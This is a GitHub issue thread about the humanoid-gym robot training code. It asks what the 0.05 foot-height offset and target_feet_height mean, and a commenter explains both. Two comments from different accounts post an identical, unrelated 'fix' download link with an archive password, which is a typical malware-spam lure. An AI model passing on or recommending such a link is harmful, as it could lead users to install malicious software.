### ISSUE TITLE
Is there a relationship between the target feet height and the initial robot joint position and the reference joint position?

### ISSUE THREAD

**Issue by Zhangxiaof001** [roboterax/humanoid-gym#32]
Hi, how to set self.cfg.rewards.target_feet_height  value ? Is there a relationship between the target feet height and the initial robot joint position and the reference joint position ? and i find 0.05 in code `feet_z = self.rigid_state[:, self.feet_indices, 2] - 0.05` , what's it means ? Looking forward to your help！

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by zlw21gxy** [comment]
The value of 0.05 is assigned because when the robot is positioned on a planar ground, the height of its feet is 0.05 meters. This is attributed to the mesh that we employ, and we select the target_feet_height based on certain estimations, in order to prevent the velocity and acceleration of the feet from being excessively high. Regarding the initial position of the robot's joints, it is designed by the hardware team. We formulate the reference joint movement in such a way that the leg moves up and down in accordance with the gait cycle.

**Comment by Zhangxiaof001** [comment]
thank you.
